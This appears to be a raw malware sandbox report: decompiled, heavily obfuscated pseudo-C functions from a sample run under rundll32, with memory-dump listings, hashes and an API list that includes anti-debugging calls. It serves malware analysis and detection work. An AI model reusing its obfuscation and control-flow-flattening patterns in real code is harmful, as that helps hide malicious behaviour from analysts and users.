                                                                                                                    				_v64 = 0x95f516;
                                                                                                                    				_v64 = _v64 + 0xffffc55a;
                                                                                                                    				_v64 = _v64 | 0x523f0ae6;
                                                                                                                    				_v64 = _v64 ^ 0x52b19695;
                                                                                                                    				_v84 = 0x271827;
                                                                                                                    				_v84 = _v84 + 0xffff7017;
                                                                                                                    				_v84 = _v84 + 0x1e15;
                                                                                                                    				_v84 = _v84 ^ 0xa1c53b6b;
                                                                                                                    				_v84 = _v84 ^ 0xa1e64a9e;
                                                                                                                    				_v52 = 0x3d5883;
                                                                                                                    				_v52 = _v52 >> 5;
                                                                                                                    				_v52 = _v52 << 3;
                                                                                                                    				_v52 = _v52 ^ 0x000b56f4;
                                                                                                                    				_v56 = 0xd5acf2;
                                                                                                                    				_v56 = _v56 ^ 0x15c9a5cd;
                                                                                                                    				_v56 = _v56 << 3;
                                                                                                                    				_v56 = _v56 ^ 0xa8e6808a;
                                                                                                                    				_v88 = 0xcc2476;
                                                                                                                    				_v88 = _v88 + 0x4ceb;
                                                                                                                    				_v88 = _v88 ^ 0xdbab884b;
                                                                                                                    				_t228 = 0x4f;
                                                                                                                    				_v88 = _v88 / _t228;
                                                                                                                    				_v88 = _v88 ^ 0x02ce2d39;
                                                                                                                    				_v20 = 0x9b21e;
                                                                                                                    				_v20 = _v20 + 0x218b;
                                                                                                                    				_v20 = _v20 ^ 0x00037084;
                                                                                                                    				_v76 = 0xcba48;
                                                                                                                    				_t229 = 0x5a;
                                                                                                                    				_t222 = _v12;
                                                                                                                    				_v76 = _v76 * 0x7b;
                                                                                                                    				_v76 = _v76 + 0x3acc;
                                                                                                                    				_v76 = _v76 << 0x10;
                                                                                                                    				_v76 = _v76 ^ 0xbb6cb0a9;
                                                                                                                    				_v80 = 0x9c886e;
                                                                                                                    				_v80 = _v80 ^ 0x88757b42;
                                                                                                                    				_t230 = 0x5c;
                                                                                                                    				_v80 = _v80 / _t229;
                                                                                                                    				_v80 = _v80 << 0xe;
                                                                                                                    				_v80 = _v80 ^ 0x5c6ae118;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t213 = 0xa360d2e;
                                                                                                                    					do {
                                                                                                                    						while(_t257 != _t213) {
                                                                                                                    							if(_t257 == 0xb87cfc3) {
                                                                                                                    								_t223 =  *0x353e10; // 0x0
                                                                                                                    								_t224 = _t223 + 0x1c;
                                                                                                                    								while(1) {
                                                                                                                    									__eflags =  *_t224 - _t230;
                                                                                                                    									if(__eflags == 0) {
                                                                                                                    										break;
                                                                                                                    									}
                                                                                                                    									_t224 = _t224 + 2;
                                                                                                                    									__eflags = _t224;
                                                                                                                    								}
                                                                                                                    								_t222 = _t224 + 2;
                                                                                                                    								_t257 = 0xc7301de;
                                                                                                                    								goto L1;
                                                                                                                    							} else {
                                                                                                                    								if(_t257 == 0xc7301de) {
                                                                                                                    									_push(_v48);
                                                                                                                    									_push(_v44);
                                                                                                                    									_t216 = E0034DCF7(_v40, 0x331080, __eflags);
                                                                                                                    									_pop(_t236);
                                                                                                                    									__eflags = E0033AAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
                                                                                                                    									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
                                                                                                                    									E0033A8B0(_v60, _t216, _v64);
                                                                                                                    									_t261 =  &(_t261[0xf]);
                                                                                                                    									L14:
                                                                                                                    									_t213 = 0xa360d2e;
                                                                                                                    									_t230 = 0x5c;
                                                                                                                    									goto L15;
                                                                                                                    								} else {
                                                                                                                    									if(_t257 == 0xdd28c3f) {
                                                                                                                    										E00331FD1(_v20, _v76, _v80, _v16);
                                                                                                                    									} else {
                                                                                                                    										if(_t257 != 0xf52a3f4) {
                                                                                                                    											goto L15;
                                                                                                                    										} else {
                                                                                                                    											_t257 = 0xb87cfc3;
                                                                                                                    											continue;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							L18:
                                                                                                                    							return _v12;
                                                                                                                    						}
                                                                                                                    						_t214 = E00331F53(_v16, _v84, _v52, _t222, _v56, _v88);
                                                                                                                    						_t261 =  &(_t261[4]);
                                                                                                                    						__eflags = _t214;
                                                                                                                    						_t257 = 0xdd28c3f;
                                                                                                                    						_t191 = _t214 == 0;
                                                                                                                    						__eflags = _t191;
                                                                                                                    						_v12 = 0 | _t191;
                                                                                                                    						goto L14;
                                                                                                                    						L15:
                                                                                                                    						__eflags = _t257 - 0x57f878b;
                                                                                                                    					} while (__eflags != 0);
                                                                                                                    					goto L18;
                                                                                                                    				}
                                                                                                                    			}











































                                                                                                                    0x00000000
                                                                                                                    0x0033412a
                                                                                                                    0x00334130
                                                                                                                    0x0033422e
                                                                                                                    0x00334136
                                                                                                                    0x0033413c
                                                                                                                    0x00000000
                                                                                                                    0x00334142
                                                                                                                    0x00334142
                                                                                                                    0x00000000
                                                                                                                    0x00334142
                                                                                                                    0x0033413c
                                                                                                                    0x00334130
                                                                                                                    0x00334128
                                                                                                                    0x00334235
                                                                                                                    0x00334240
                                                                                                                    0x00334240
                                                                                                                    0x003341f0
                                                                                                                    0x003341f7
                                                                                                                    0x003341fa
                                                                                                                    0x003341fc
                                                                                                                    0x00334201
                                                                                                                    0x00334201
                                                                                                                    0x00334204
                                                                                                                    0x00000000
                                                                                                                    0x00334210
                                                                                                                    0x00334210
                                                                                                                    0x00334210
                                                                                                                    0x00000000
                                                                                                                    0x0033421c

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                    • API String ID: 0-3177096336
                                                                                                                    • Opcode ID: 9b0c434da2b6a5fe25960c182e705057e1f610ffc440a1a8ebd4fb943a089523
                                                                                                                    • Instruction ID: 1caa20f1320ac15ffec32b3cffd6deaa0078403b57a94f4956ee3b1da6c8295a
                                                                                                                    • Opcode Fuzzy Hash: 9b0c434da2b6a5fe25960c182e705057e1f610ffc440a1a8ebd4fb943a089523
                                                                                                                    • Instruction Fuzzy Hash: 1BA140B25083409FC798CF26D88A41BBBF1FBD4758F108A1DF1958A260D3B58949CF47
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0033B74D(void* __ecx, void* __edx) {
                                                                                                                    				signed int _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				void* _t231;
                                                                                                                    				intOrPtr _t232;
                                                                                                                    				intOrPtr _t233;
                                                                                                                    				void* _t237;
                                                                                                                    				signed int _t239;
                                                                                                                    				signed int _t240;
                                                                                                                    				signed int _t241;
                                                                                                                    				signed int _t242;
                                                                                                                    				void* _t266;
                                                                                                                    				void* _t267;
                                                                                                                    				signed int* _t270;
                                                                                                                    				signed int* _t271;
                                                                                                                    
                                                                                                                    				_t270 =  &_v104;
                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                    				_v12 = 0x6c2b32;
                                                                                                                    				_v8 = 0x58b11;
                                                                                                                    				_v64 = 0x37f8ee;
                                                                                                                    				_v64 = _v64 + 0xffff6702;
                                                                                                                    				_v64 = _v64 ^ 0xad40df3f;
                                                                                                                    				_v64 = _v64 ^ 0xad79282c;
                                                                                                                    				_v100 = 0x6d524;
                                                                                                                    				_v100 = _v100 >> 0xf;
                                                                                                                    				_v100 = _v100 + 0x2921;
                                                                                                                    				_v100 = _v100 >> 6;
                                                                                                                    				_v100 = _v100 ^ 0x00050ee9;
                                                                                                                    				_v28 = 0x9e9a;
                                                                                                                    				_t266 = __edx;
                                                                                                                    				_t237 = __ecx;
                                                                                                                    				_t267 = 0x52ffaa2;
                                                                                                                    				_t239 = 0xb;
                                                                                                                    				_v28 = _v28 / _t239;
                                                                                                                    				_v28 = _v28 ^ 0x00028e70;
                                                                                                                    				_v32 = 0x2476b5;
                                                                                                                    				_t240 = 0x6f;
                                                                                                                    				_v32 = _v32 / _t240;
                                                                                                                    				_v32 = _v32 ^ 0x0008b44d;
                                                                                                                    				_v60 = 0x9e7d2d;
                                                                                                                    				_v60 = _v60 >> 0xc;
                                                                                                                    				_v60 = _v60 << 0xe;
                                                                                                                    				_v60 = _v60 ^ 0x02752993;
                                                                                                                    				_v24 = 0xe09194;
                                                                                                                    				_t241 = 0x44;
                                                                                                                    				_v24 = _v24 / _t241;
                                                                                                                    				_v24 = _v24 ^ 0x0009703f;
                                                                                                                    				_v96 = 0x854eb1;
                                                                                                                    				_v96 = _v96 + 0xc1c6;
                                                                                                                    				_v96 = _v96 * 0x1a;
                                                                                                                    				_v96 = _v96 | 0x594c04b7;
                                                                                                                    				_v96 = _v96 ^ 0x5dd9e9b5;
                                                                                                                    				_v20 = 0x86d30b;
                                                                                                                    				_v20 = _v20 | 0xe45dff90;
                                                                                                                    				_v20 = _v20 ^ 0xe4d4624e;
                                                                                                                    				_v92 = 0x8501b9;
                                                                                                                    				_v92 = _v92 >> 6;
                                                                                                                    				_v92 = _v92 * 0x2f;
                                                                                                                    				_v92 = _v92 + 0xe9ed;
                                                                                                                    				_v92 = _v92 ^ 0x0060653e;
                                                                                                                    				_v52 = 0xaa921f;
                                                                                                                    				_v52 = _v52 ^ 0x3dfd2146;
                                                                                                                    				_v52 = _v52 >> 1;
                                                                                                                    				_v52 = _v52 ^ 0x1ea8ab64;
                                                                                                                    				_v56 = 0x2765e6;
                                                                                                                    				_v56 = _v56 ^ 0x5c8ea534;
                                                                                                                    				_v56 = _v56 | 0xccee86e2;
                                                                                                                    				_v56 = _v56 ^ 0xdcebf872;
                                                                                                                    				_v88 = 0x89b797;
                                                                                                                    				_v88 = _v88 + 0x84ba;
                                                                                                                    				_v88 = _v88 + 0xc14;
                                                                                                                    				_v88 = _v88 | 0xbe23ba3f;
                                                                                                                    				_v88 = _v88 ^ 0xbea6e118;
                                                                                                                    				_v48 = 0x866a1d;
                                                                                                                    				_v48 = _v48 >> 9;
                                                                                                                    				_v48 = _v48 * 0x16;
                                                                                                                    				_v48 = _v48 ^ 0x0007ec78;
                                                                                                                    				_v16 = 0x7d5d8a;
                                                                                                                    				_v16 = _v16 >> 8;
                                                                                                                    				_v16 = _v16 ^ 0x000578c4;
                                                                                                                    				_v68 = 0x2c77b1;
                                                                                                                    				_v68 = _v68 | 0xad369f51;
                                                                                                                    				_v68 = _v68 << 0xd;
                                                                                                                    				_v68 = _v68 ^ 0xdff48475;
                                                                                                                    				_v72 = 0x3ef83;
                                                                                                                    				_v72 = _v72 << 3;
                                                                                                                    				_v72 = _v72 + 0xb46;
                                                                                                                    				_v72 = _v72 ^ 0x001ba742;
                                                                                                                    				_v76 = 0x4a0f2c;
                                                                                                                    				_t242 = 0x6a;
                                                                                                                    				_v76 = _v76 * 0x54;
                                                                                                                    				_v76 = _v76 << 0xa;
                                                                                                                    				_v76 = _v76 ^ 0x33e29f20;
                                                                                                                    				_v36 = 0x9fb368;
                                                                                                                    				_v36 = _v36 >> 0xb;
                                                                                                                    				_v36 = _v36 ^ 0x000f389a;
                                                                                                                    				_v40 = 0x5cfe3a;
                                                                                                                    				_v40 = _v40 + 0x27ff;
                                                                                                                    				_v40 = _v40 ^ 0x005ee30c;
                                                                                                                    				_v104 = 0xfd26ea;
                                                                                                                    				_v104 = _v104 << 9;
                                                                                                                    				_v104 = _v104 + 0xffff1095;
                                                                                                                    				_v104 = _v104 + 0xffffd24c;
                                                                                                                    				_v104 = _v104 ^ 0xfa4b2973;
                                                                                                                    				_v80 = 0xbb493f;
                                                                                                                    				_v80 = _v80 + 0x4ae2;
                                                                                                                    				_v80 = _v80 | 0xbb4dbcb8;
                                                                                                                    				_v80 = _v80 + 0x3bc7;
                                                                                                                    				_v80 = _v80 ^ 0xbbf0b3fa;
                                                                                                                    				_v44 = 0xfc3c2e;
                                                                                                                    				_v44 = _v44 << 0x10;
                                                                                                                    				_v44 = _v44 + 0xffff4208;
                                                                                                                    				_v44 = _v44 ^ 0x3c281d99;
                                                                                                                    				_v84 = 0xc50344;
                                                                                                                    				_v84 = _v84 | 0xb9ed19f4;
                                                                                                                    				_v84 = _v84 / _t242;
                                                                                                                    				_t243 = 0x6b;
                                                                                                                    				_v84 = _v84 / _t243;
                                                                                                                    				_v84 = _v84 ^ 0x000f16db;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t231 = 0xc3f018b;
                                                                                                                    					do {
                                                                                                                    						L2:
                                                                                                                    						while(_t267 != 0x52ffaa2) {
                                                                                                                    							if(_t267 == 0x865547f) {
                                                                                                                    								_t243 = _v88;
                                                                                                                    								_t232 = E0033CDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                    								_t270 =  &(_t270[2]);
                                                                                                                    								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
                                                                                                                    								__eflags = _t232;
                                                                                                                    								_t231 = 0xc3f018b;
                                                                                                                    								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    							if(_t267 == 0xb133873) {
                                                                                                                    								_push(_v32);
                                                                                                                    								_t233 = E0034C3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
                                                                                                                    								_t271 =  &(_t270[4]);
                                                                                                                    								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
                                                                                                                    								__eflags = _t233;
                                                                                                                    								if(_t233 != 0) {
                                                                                                                    									E00337B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
                                                                                                                    									_push( *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                    									_push(_v56);
                                                                                                                    									_push(_v52);
                                                                                                                    									_t243 = _v20;
                                                                                                                    									E00337C37(_v20, _v92);
                                                                                                                    									_t270 =  &(_t271[6]);
                                                                                                                    									_t267 = 0x865547f;
                                                                                                                    									goto L1;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t267 == 0xb7a2405) {
                                                                                                                    									return E00349E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                    								}
                                                                                                                    								if(_t267 != _t231) {
                                                                                                                    									goto L13;
                                                                                                                    								} else {
                                                                                                                    									_t233 = E003346BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E00334C5D, _v104);
                                                                                                                    									_t270 =  &(_t270[0xa]);
                                                                                                                    									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
                                                                                                                    									if(_t233 == 0) {
                                                                                                                    										_t267 = 0xb7a2405;
                                                                                                                    										while(1) {
                                                                                                                    											L1:
                                                                                                                    											_t231 = 0xc3f018b;
                                                                                                                    											goto L2;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							return _t233;
                                                                                                                    						}
                                                                                                                    						_t267 = 0xb133873;
                                                                                                                    						L13:
                                                                                                                    						__eflags = _t267 - 0x1aeb2e;
                                                                                                                    					} while (__eflags != 0);
                                                                                                                    					return _t231;
                                                                                                                    				}
                                                                                                                    			}










































                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                    • API String ID: 0-1675410552
                                                                                                                    • Opcode ID: b7c7e1f0423f7bd2b9372af5ec35d7f4524759ccb17b4678adbe3ec260d95e72
                                                                                                                    • Instruction ID: 88b837ef340a8ed5d0e4f0260b98963e0c1a0587ba0a9b7693a1bbe28b1cafd6
                                                                                                                    • Opcode Fuzzy Hash: b7c7e1f0423f7bd2b9372af5ec35d7f4524759ccb17b4678adbe3ec260d95e72
                                                                                                                    • Instruction Fuzzy Hash: 29B12F724083409FC359CF65C58A40BFBF2BBC5758F108A1DF68A96260D7B5CA59CF86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2579439406-0
                                                                                                                    • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                    • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                    • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                    • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E00350056() {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				char _v1560;
                                                                                                                    				char _v1564;
                                                                                                                    				signed int _v1568;
                                                                                                                    				signed int _v1572;
                                                                                                                    				signed int _v1576;
                                                                                                                    				signed int _v1580;
                                                                                                                    				signed int _v1584;
                                                                                                                    				signed int _v1588;
                                                                                                                    				signed int _v1592;
                                                                                                                    				signed int _v1596;
                                                                                                                    				signed int _v1600;
                                                                                                                    				signed int _v1604;
                                                                                                                    				signed int _v1608;
                                                                                                                    				signed int _v1612;
                                                                                                                    				signed int _v1616;
                                                                                                                    				signed int _v1620;
                                                                                                                    				signed int _v1624;
                                                                                                                    				signed int _v1628;
                                                                                                                    				signed int _v1632;
                                                                                                                    				signed int _v1636;
                                                                                                                    				signed int _v1640;
                                                                                                                    				signed int _v1644;
                                                                                                                    				signed int _v1648;
                                                                                                                    				signed int _v1652;
                                                                                                                    				unsigned int _v1656;
                                                                                                                    				signed int _v1660;
                                                                                                                    				signed int _v1664;
                                                                                                                    				signed int _v1668;
                                                                                                                    				signed int _v1672;
                                                                                                                    				signed int _v1676;
                                                                                                                    				signed int _v1680;
                                                                                                                    				signed int _v1684;
                                                                                                                    				signed int _v1688;
                                                                                                                    				signed int _v1692;
                                                                                                                    				signed int _v1696;
                                                                                                                    				signed int _v1700;
                                                                                                                    				signed int _v1704;
                                                                                                                    				signed int _v1708;
                                                                                                                    				signed int _v1712;
                                                                                                                    				signed int _v1716;
                                                                                                                    				signed int _v1720;
                                                                                                                    				signed int _v1724;
                                                                                                                    				signed int _v1728;
                                                                                                                    				signed int _v1732;
                                                                                                                    				signed int _v1736;
                                                                                                                    				signed int _v1740;
                                                                                                                    				signed int _v1744;
                                                                                                                    				signed int _v1748;
                                                                                                                    				void* _t500;
                                                                                                                    				void* _t502;
                                                                                                                    				intOrPtr* _t509;
                                                                                                                    				void* _t513;
                                                                                                                    				signed int _t522;
                                                                                                                    				intOrPtr _t523;
                                                                                                                    				intOrPtr* _t524;
                                                                                                                    				signed int _t525;
                                                                                                                    				signed int _t526;
                                                                                                                    				signed int _t527;
                                                                                                                    				signed int _t528;
                                                                                                                    				signed int _t529;
                                                                                                                    				signed int _t530;
                                                                                                                    				signed int _t531;
                                                                                                                    				signed int _t532;
                                                                                                                    				signed int _t533;
                                                                                                                    				signed int _t534;
                                                                                                                    				signed int _t535;
                                                                                                                    				signed int _t536;
                                                                                                                    				signed int _t537;
                                                                                                                    				signed int _t538;
                                                                                                                    				signed int _t539;
                                                                                                                    				void* _t540;
                                                                                                                    				void* _t546;
                                                                                                                    				intOrPtr _t556;
                                                                                                                    				void* _t603;
                                                                                                                    				signed int _t605;
                                                                                                                    				signed int* _t609;
                                                                                                                    
                                                                                                                    				_t609 =  &_v1748;
                                                                                                                    				_v1648 = 0xded5e0;
                                                                                                                    				_v1648 = _v1648 >> 0xb;
                                                                                                                    				_v1648 = _v1648 | 0x3a1a97de;
                                                                                                                    				_v1648 = _v1648 ^ 0x3a1a9ff7;
                                                                                                                    				_v1608 = 0x6694ca;
                                                                                                                    				_v1608 = _v1608 | 0xdc2b4f48;
                                                                                                                    				_v1608 = _v1608 ^ 0x5c6fdfcb;
                                                                                                                    				_v1712 = 0x53f825;
                                                                                                                    				_v1712 = _v1712 >> 2;
                                                                                                                    				_v1712 = _v1712 ^ 0x4e440c95;
                                                                                                                    				_v1712 = _v1712 | 0x7235b0e7;
                                                                                                                    				_v1712 = _v1712 ^ 0x7e75f2fd;
                                                                                                                    				_v1632 = 0xc6d169;
                                                                                                                    				_v1568 = 0;
                                                                                                                    				_t603 = 0x9805d0a;
                                                                                                                    				_t525 = 0x52;
                                                                                                                    				_v1632 = _v1632 / _t525;
                                                                                                                    				_t526 = 0x67;
                                                                                                                    				_v1632 = _v1632 * 0x1e;
                                                                                                                    				_v1632 = _v1632 ^ 0x0048bcfb;
                                                                                                                    				_v1596 = 0x189afb;
                                                                                                                    				_v1596 = _v1596 >> 0xe;
                                                                                                                    				_v1596 = _v1596 ^ 0x000d7c1d;
                                                                                                                    				_v1724 = 0x4bfed1;
                                                                                                                    				_v1724 = _v1724 * 0x63;
                                                                                                                    				_v1724 = _v1724 * 0x55;
                                                                                                                    				_v1724 = _v1724 >> 1;
                                                                                                                    				_v1724 = _v1724 ^ 0x61069d5d;
                                                                                                                    				_v1580 = 0x401b2b;
                                                                                                                    				_v1580 = _v1580 + 0x7090;
                                                                                                                    				_v1580 = _v1580 ^ 0x00412b45;
                                                                                                                    				_v1672 = 0xbaa782;
                                                                                                                    				_v1672 = _v1672 / _t526;
                                                                                                                    				_v1672 = _v1672 << 2;
                                                                                                                    				_v1672 = _v1672 ^ 0x000e5528;
                                                                                                                    				_v1624 = 0x1efbce;
                                                                                                                    				_t527 = 0x4f;
                                                                                                                    				_v1624 = _v1624 / _t527;
                                                                                                                    				_v1624 = _v1624 ^ 0x000dc160;
                                                                                                                    				_v1572 = 0x9ef416;
                                                                                                                    				_t605 = 0x62;
                                                                                                                    				_v1572 = _v1572 / _t605;
                                                                                                                    				_v1572 = _v1572 ^ 0x00079814;
                                                                                                                    				_v1612 = 0x4efe15;
                                                                                                                    				_t528 = 0x43;
                                                                                                                    				_v1612 = _v1612 / _t528;
                                                                                                                    				_v1612 = _v1612 ^ 0x000e5446;
                                                                                                                    				_v1640 = 0x94326d;
                                                                                                                    				_t529 = 0x77;
                                                                                                                    				_v1640 = _v1640 / _t529;
                                                                                                                    				_t530 = 0x35;
                                                                                                                    				_v1640 = _v1640 / _t530;
                                                                                                                    				_v1640 = _v1640 ^ 0x000d83b8;
                                                                                                                    				_v1676 = 0x511d41;
                                                                                                                    				_t531 = 9;
                                                                                                                    				_v1676 = _v1676 * 0x76;
                                                                                                                    				_v1676 = _v1676 ^ 0xeef8e480;
                                                                                                                    				_v1676 = _v1676 ^ 0xcb952f57;
                                                                                                                    				_v1708 = 0x4e0a18;
                                                                                                                    				_v1708 = _v1708 ^ 0x2110c6ad;
                                                                                                                    				_v1708 = _v1708 | 0x4a7f48ac;
                                                                                                                    				_v1708 = _v1708 + 0xffff2cb4;
                                                                                                                    				_v1708 = _v1708 ^ 0x6b758b76;
                                                                                                                    				_v1732 = 0x7a6741;
                                                                                                                    				_t123 =  &_v1732; // 0x7a6741
                                                                                                                    				_v1732 =  *_t123 / _t531;
                                                                                                                    				_v1732 = _v1732 << 0xe;
                                                                                                                    				_v1732 = _v1732 << 7;
                                                                                                                    				_v1732 = _v1732 ^ 0x36245548;
                                                                                                                    				_v1700 = 0x42788;
                                                                                                                    				_t532 = 0x44;
                                                                                                                    				_v1700 = _v1700 / _t532;
                                                                                                                    				_v1700 = _v1700 | 0xce808109;
                                                                                                                    				_v1700 = _v1700 + 0xffff7a0f;
                                                                                                                    				_v1700 = _v1700 ^ 0xce88d2ed;
                                                                                                                    				_v1740 = 0x39c25c;
                                                                                                                    				_v1740 = _v1740 + 0xf71;
                                                                                                                    				_t533 = 0x75;
                                                                                                                    				_v1740 = _v1740 / _t533;
                                                                                                                    				_v1740 = _v1740 ^ 0xc60840fd;
                                                                                                                    				_v1740 = _v1740 ^ 0xc60d36f5;
                                                                                                                    				_v1716 = 0x2bcc6c;
                                                                                                                    				_v1716 = _v1716 + 0x97be;
                                                                                                                    				_v1716 = _v1716 >> 0xd;
                                                                                                                    				_v1716 = _v1716 ^ 0xcb020dbc;
                                                                                                                    				_v1716 = _v1716 ^ 0xcb05808e;
                                                                                                                    				_v1604 = 0x3f7ac0;
                                                                                                                    				_v1604 = _v1604 + 0xafc6;
                                                                                                                    				_v1604 = _v1604 ^ 0x0048c4ef;
                                                                                                                    				_v1576 = 0x9f011d;
                                                                                                                    				_v1576 = _v1576 ^ 0x8bb25c52;
                                                                                                                    				_v1576 = _v1576 ^ 0x8b2a60ae;
                                                                                                                    				_v1684 = 0xe4045e;
                                                                                                                    				_v1684 = _v1684 * 0x42;
                                                                                                                    				_v1684 = _v1684 * 0xc;
                                                                                                                    				_v1684 = _v1684 ^ 0xc16ccb70;
                                                                                                                    				_v1720 = 0x76be5;
                                                                                                                    				_v1720 = _v1720 >> 0xd;
                                                                                                                    				_v1720 = _v1720 * 0x3b;
                                                                                                                    				_v1720 = _v1720 + 0xffffaa4e;
                                                                                                                    				_v1720 = _v1720 ^ 0xfff1ea6d;
                                                                                                                    				_v1680 = 0x1fb4c3;
                                                                                                                    				_v1680 = _v1680 << 4;
                                                                                                                    				_v1680 = _v1680 << 0xc;
                                                                                                                    				_v1680 = _v1680 ^ 0xb4c6c556;
                                                                                                                    				_v1644 = 0xb0dbcd;
                                                                                                                    				_v1644 = _v1644 << 0xf;
                                                                                                                    				_v1644 = _v1644 << 0x10;
                                                                                                                    				_v1644 = _v1644 ^ 0x800a09c5;
                                                                                                                    				_v1600 = 0x1a67e8;
                                                                                                                    				_v1600 = _v1600 | 0xeb4b5744;
                                                                                                                    				_v1600 = _v1600 ^ 0xeb54c7c0;
                                                                                                                    				_v1652 = 0x1784b1;
                                                                                                                    				_v1652 = _v1652 >> 0xf;
                                                                                                                    				_v1652 = _v1652 << 6;
                                                                                                                    				_v1652 = _v1652 ^ 0x00082079;
                                                                                                                    				_v1660 = 0xec7770;
                                                                                                                    				_v1660 = _v1660 + 0xb190;
                                                                                                                    				_v1660 = _v1660 | 0x400c0cca;
                                                                                                                    				_v1660 = _v1660 ^ 0x40ee2104;
                                                                                                                    				_v1668 = 0xfc9259;
                                                                                                                    				_v1668 = _v1668 + 0xffffc6b7;
                                                                                                                    				_v1668 = _v1668 >> 0xe;
                                                                                                                    				_v1668 = _v1668 ^ 0x000f272a;
                                                                                                                    				_v1704 = 0xff7fae;
                                                                                                                    				_v1704 = _v1704 + 0xffff711f;
